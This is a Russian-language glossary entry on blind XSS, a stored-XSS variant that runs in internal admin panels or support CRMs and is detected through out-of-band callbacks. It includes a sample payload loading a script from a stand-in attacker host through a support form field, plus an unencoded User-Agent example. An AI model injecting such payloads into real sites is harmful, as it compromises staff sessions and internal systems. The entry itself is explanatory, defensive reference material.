Слепой XSS
Что такое Слепой XSS?
Слепой XSSРазновидность хранимого XSS, в которой полезная нагрузка срабатывает в недоступном злоумышленнику контексте, обычно во внутренней админ-панели.
Слепой XSS — подкласс хранимого XSS: вредоносный скрипт выполняется не в браузере атакующего, а в ином, как правило привилегированном контексте — окне обращения в поддержку, консоли антифрод-проверки, внутренней панели или отчёте бэкапа. Атакующий отправляет полезную нагрузку через публичную форму (контакт, регистрация, тикет) и ждёт, пока сотрудник откроет сохранённые данные. Обнаружение основано на внеполосных callback'ах: нагрузка отправляет информацию на XSS Hunter, Burp Collaborator или собственный DNS/HTTP-сервер, раскрывая, где сработал скрипт. Защита совпадает с защитой от хранимого XSS плюс строгая CSP для админ-инструментов.
● Примеры
- 01
Поле формы поддержки со <script src=https://x.attacker/x.js></script>, срабатывающее в CRM оператора.
- 02
Заголовок User-Agent, отображаемый в админ-просмотрщике логов без HTML-кодирования.
● Частые вопросы
Что такое Слепой XSS?
Разновидность хранимого XSS, в которой полезная нагрузка срабатывает в недоступном злоумышленнику контексте, обычно во внутренней админ-панели. Относится к категории Атаки и угрозы в кибербезопасности.
Что означает Слепой XSS?
Разновидность хранимого XSS, в которой полезная нагрузка срабатывает в недоступном злоумышленнику контексте, обычно во внутренней админ-панели.
Как защититься от Слепой XSS?
Защита от Слепой XSS обычно сочетает технические меры и операционные практики, как описано в определении выше.
Какие есть другие названия Слепой XSS?
Распространённые альтернативные названия: Внеполосный XSS.